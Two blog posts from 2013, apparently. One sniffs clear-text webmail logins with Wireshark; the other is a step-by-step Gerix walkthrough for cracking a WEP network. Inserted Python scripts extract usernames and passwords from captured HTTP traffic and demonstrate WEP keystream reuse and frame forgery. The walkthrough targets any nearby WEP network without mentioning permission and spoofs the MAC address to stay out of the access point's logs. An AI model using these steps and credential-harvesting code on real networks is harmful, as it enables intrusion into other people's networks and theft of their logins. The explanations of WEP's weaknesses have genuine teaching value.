Friday, July 19, 2013

Sniffing to see who done it.. on the network

So, is it a big deal if someone hops on your wireless network? Yes, kind of. It is more of an eavesdropping risk for someone to be on your wireless network than to plug into a port on your switch. Wireless is a shared medium, much like an old hub: every station in range of the access point receives every frame that the AP and the other clients put on the air, and the stations take turns on the channel using CSMA/CA (collision avoidance; CSMA/CD is the wired Ethernet scheme). A switch, on the other hand, learns which MAC address sits behind which port and forwards unicast frames only to that port, so you have as many collision domains as you have ports and a normal client sees only its own traffic plus broadcasts.

With all that being said, anyone connected to your wireless network can capture what you send and receive. On an open network the frames are in the clear. On a WEP or WPA/WPA2-PSK network they are encrypted, but everyone who holds the shared key can decrypt them (for WPA the attacker also needs to capture your four-way handshake, which a deauth forces in seconds). Layer 2 client isolation on the AP stops clients from talking to each other through the AP, but it does nothing against a card in monitor mode that simply listens to the air.

Since we installed BackTrack last time we will use it again. It comes pre-loaded with Wireshark, so open it up.


Select the wireless interface you plan on using to capture the packets and click Start. To see other stations' traffic the interface must be in monitor mode (the mon0 interface that airmon-ng or Gerix creates); in normal managed mode you will only capture your own frames and broadcasts.


It will start recording everything on the air, which is a lot of data, so we need a display filter that narrows it down to what we are after: logins and passwords. Click Expression and scroll down to find the protocol field you want. In this example I use HTTP filtering with the value "username" to find any request where a username is transferred in clear text (typing the display filter http contains "username" directly into the filter bar does the same thing).


If you want to gather information on a particular website you can filter on its host name (the http.host field), and if you know the IP of the workstation you can filter by address as well (ip.addr == its IP).

Once I applied my filter, the results included an HTTP form login for webmail access that did not use SSL. Expanding the result below displayed the username and password submitted to the web page.


If the page had used SSL/TLS, the whole request, username and password included, would have been encrypted in transit and Wireshark would only show opaque TLS records, not form fields. Note that encryption, not hashing, is what protects the credential here: a site that hashes the password in the browser but posts it over plain HTTP still hands the sniffer a value that can be replayed.
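The Wireshark filter above is a manual search. As an added example (my own code, not from the original post or from Wireshark), here is the same check done programmatically over reassembled HTTP requests: it pulls clear-text credentials out of form POSTs, GET query strings and HTTP Basic authorization headers. The sample requests are constructed for the demo, and the list of field names treated as username and password fields is an assumption you would tune to the sites you care about.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Field names that commonly carry a login or a password in HTML forms (assumed list; extend as needed).
USER_FIELD = re.compile(r"^(user(name)?|login|email|uid|account)$", re.I)
PASS_FIELD = re.compile(r"^(pass(word|wd)?|pwd|secret)$", re.I)


def parse_http_request(payload: bytes):
    """Split one reassembled HTTP request into (method, target, headers, body)."""
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)  # ValueError if not a request line
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def _pick_credentials(fields: dict):
    """Return (username, password) from parsed form/query fields, or None if either is missing."""
    user = password = None
    for name, values in fields.items():
        if USER_FIELD.match(name):
            user = values[0]
        elif PASS_FIELD.match(name):
            password = values[0]
    return (user, password) if user is not None and password is not None else None


def extract_credentials(payload: bytes):
    """Return a dict describing clear-text credentials found in one HTTP request, else None."""
    try:
        method, target, headers, body = parse_http_request(payload)
    except ValueError:
        return None  # not a well-formed request
    host = headers.get("host", "")
    path = urlsplit(target).path

    # 1. HTTP Basic auth: base64 is an encoding, not encryption.
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            decoded = base64.b64decode(auth[6:], validate=True).decode("latin-1")
        except ValueError:
            decoded = None  # malformed header; fall through to the form checks
        if decoded is not None:
            user, _, password = decoded.partition(":")
            return {"host": host, "path": path, "username": user, "password": password, "via": "basic"}

    # 2. Form fields, either in a POST body or in a GET query string.
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        found = _pick_credentials(parse_qs(body.decode("latin-1"), keep_blank_values=True))
        via = "form"
    else:
        found = _pick_credentials(parse_qs(urlsplit(target).query, keep_blank_values=True))
        via = "query"
    if found:
        return {"host": host, "path": path, "username": found[0], "password": found[1], "via": via}
    return None


def scan_payloads(payloads):
    """Run the extractor over a list of reassembled requests and return only the hits."""
    return [hit for hit in (extract_credentials(p) for p in payloads) if hit]


# Constructed sample captures for the demo (not taken from the article's capture).
WEBMAIL_LOGIN = (
    b"POST /webmail/login.php HTTP/1.1\r\n"
    b"Host: mail.example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 60\r\n\r\n"
    b"username=alice%40example.com&password=s3cret%21&submit=Login"
)
ROUTER_BASIC = (
    b"GET /admin/status.cgi HTTP/1.1\r\n"
    b"Host: 192.168.1.1\r\n"
    b"Authorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n"
)
PLAIN_GET = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"

if __name__ == "__main__":
    for hit in scan_payloads([WEBMAIL_LOGIN, ROUTER_BASIC, PLAIN_GET]):
        print(f"{hit['via']:5} {hit['host']}{hit['path']}: {hit['username']} / {hit['password']}")
```

Feed it the TCP payloads from a pcap (for example the output of Wireshark's "Follow TCP Stream" or scapy's TCP session reassembly) and it reports every request that leaked a login. The same three carriers are what a TLS-protected site hides from a passive listener.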

Thursday, July 11, 2013

Cracking WEP wireless network


     Online encryption is important, but most people I've come across never give it a second thought. They don't think a hacker will target them because they are just ordinary people. But we regular folks are the ones they are after! Attackers use minions to achieve their goals precisely because minions are disposable. This post is the first of a 3 part series that demonstrates how to get into a wireless network protected with WEP, sniff the network traffic, and then use the data collected to impersonate a user. The goal is to raise awareness of how vulnerable wireless connections are.

     There are hundreds of articles online that will teach you how to crack a wireless network. Now there is another one.

1) Download Backtrack ISO and burn it to CD and then boot from the disc.
       You don't need to install it to the hard drive, but you can
       I will be using the BT5R3-GNOME-32 for this demonstration
2) Once it is installed or booted up, login and start the GUI
       Default user name is root and the password is toor
       Type startx to start the GUI
3) The tool we will use is Gerix
       Navigate to: Applications, BackTrack, Exploitations Tools, WLAN Exploitation, gerix-wifi-cracker-ng


4) Click the configuration tab and highlight your wireless adapter (wlan0) listed under interface
       If there is no adapter present, refer to the notes at the end of this article
5) Click enable/disable monitor mode to create a new interface (mon0)
       Highlight mon0 and set a random MAC address (this keeps your real hardware address out of the AP's logs)


6) Scroll down and click rescan networks
       After the wireless network appears, select one from the list with WEP encryption and decent signal strength


7) Navigate to the WEP tab and start sniffing
       A box will appear, just move it aside, don’t close it
          The number below #Data is what we are monitoring: the count of captured data frames, each of which carries a fresh 24-bit IV in the clear, and it is unique IVs that the key recovery needs
          The more traffic on the network the faster it grows, but if the network is quiet we can inject packets to generate traffic


If no one is on the network then you will need to generate traffic yourself. Click test injection first to confirm that your card can inject frames and that the AP answers them.

8) Try a ChopChop attack first, then create an ARP packet to be injected and inject the created ARP packet
       ChopChop recovers the keystream of one captured frame a byte at a time by abusing the CRC-32 ICV; that keystream is then used to forge an ARP request, and every time the AP relays it a new IV comes back
       Another window will pop up and ask if you want to inject the created packet, type Y and hit enter
       This will make #Data climb much faster (try the fragmentation attack if ChopChop doesn't work)


9) Once you have at least 5000, try and crack (the count you actually need depends on key length and luck: 40-bit keys usually fall with a few tens of thousands of IVs, 104-bit keys need more, so just try and retry)
       Click on the Cracking tab and click on Decrypt WEP password


     Another Window will pop up and will display the password when successful


If you don't have enough #Data it will not succeed. Leave the capture and injection running, and click Decrypt WEP again when you have more (10,000, 15,000 and so on).
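Steps 7 to 9 work because of two properties of WEP that Gerix hides behind buttons. As an added example (my own code, not from the post, from Gerix or from aircrack-ng), here is a minimal WEP frame encryptor/decryptor showing both: the per-frame key is just the clear-text IV glued onto the shared key, so two frames with the same IV share one RC4 keystream and a known plaintext (an ARP request, whose header bytes are predictable) reveals the keystream for every other frame with that IV; and the ICV is a plain CRC-32, which is linear, so an attacker can flip chosen plaintext bits in a captured frame and fix the ICV without the key. The key, IV and packet contents below are constructed for the demo.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling followed by the keystream generator, XORed onto data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP's integrity check value: CRC-32 of the payload, little-endian, appended before encryption."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Encrypted part of a WEP data frame: IV(3) | key-id(1) | RC4(IV || key, plaintext || ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13), "40-bit or 104-bit key, 24-bit IV"
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes):
    """Decrypt with the key and verify the ICV; returns the plaintext or None if the check fails."""
    iv_bytes, body = frame[:3], frame[4:]
    clear = rc4(iv_bytes + key, body)
    plaintext, check = clear[:-4], clear[-4:]
    return plaintext if icv(plaintext) == check else None


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known plaintext XOR ciphertext = the RC4 keystream for this frame's IV (no key needed)."""
    known = known_plaintext + icv(known_plaintext)
    return bytes(c ^ p for c, p in zip(frame[4:], known))


def decrypt_with_keystream(keystream: bytes, frame: bytes):
    """Decrypt any other frame that reuses the same IV, using only the recovered keystream."""
    body = frame[4:]
    if len(body) > len(keystream):
        return None  # keystream too short for this frame
    clear = bytes(c ^ k for c, k in zip(body, keystream))
    plaintext, check = clear[:-4], clear[-4:]
    return plaintext if icv(plaintext) == check else None


def forge_frame(frame: bytes, delta: bytes) -> bytes:
    """Flip plaintext bits in an encrypted frame and repair the ICV with no key and no keystream.
    CRC-32 is affine, so crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros of the same length)."""
    body = frame[4:]
    assert len(delta) == len(body) - 4, "delta must cover the whole plaintext"
    icv_delta = struct.pack("<I", (zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))) & 0xFFFFFFFF)
    return frame[:4] + bytes(b ^ d for b, d in zip(body, delta + icv_delta))


# Constructed demo values (assumptions, not from the article): a 40-bit key and one reused IV.
DEMO_KEY = bytes.fromhex("0102030405")
DEMO_IV = bytes.fromhex("a1b2c3")
ARP_REQUEST = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + bytes(20)  # LLC/SNAP header + ARP: predictable bytes
SECRET_MSG = b"user=alice&password=hunter2"      # a second packet sent under the same IV


def demo_keystream_reuse():
    """The known ARP frame yields the keystream that decrypts the secret frame with the same IV."""
    arp_frame = wep_encrypt(DEMO_KEY, DEMO_IV, ARP_REQUEST)
    secret_frame = wep_encrypt(DEMO_KEY, DEMO_IV, SECRET_MSG)
    keystream = recover_keystream(arp_frame, ARP_REQUEST)
    return decrypt_with_keystream(keystream, secret_frame)


def demo_forgery():
    """Turn an encrypted 'alice' into 'admin' and have the AP's ICV check accept it."""
    original, wanted = b"ALLOW user=alice", b"ALLOW user=admin"
    frame = wep_encrypt(DEMO_KEY, DEMO_IV, original)
    delta = bytes(a ^ b for a, b in zip(original, wanted))
    return wep_decrypt(DEMO_KEY, forge_frame(frame, delta))


if __name__ == "__main__":
    print("recovered without the key:", demo_keystream_reuse())
    print("forged frame decrypts to:  ", demo_forgery())
```

The second property is exactly what ChopChop and the fragmentation attack exploit to obtain keystream, and the first is why injecting the same ARP request over and over is useful: each relayed copy comes back under a new IV, and with a 24-bit IV space the repeats (and the statistically weak IV||key combinations aircrack-ng's PTW attack feeds on) pile up fast.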


     Gerix is just a GUI for the aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng and aircrack-ng). For full functionality, in particular the injection steps, your wireless adapter's chipset and driver need to support monitor mode and packet injection. The list of supported chipsets can be found on the aircrack-ng compatibility page; that page has not been updated since 2011, so there are probably more chipsets on the market that are supported than it lists.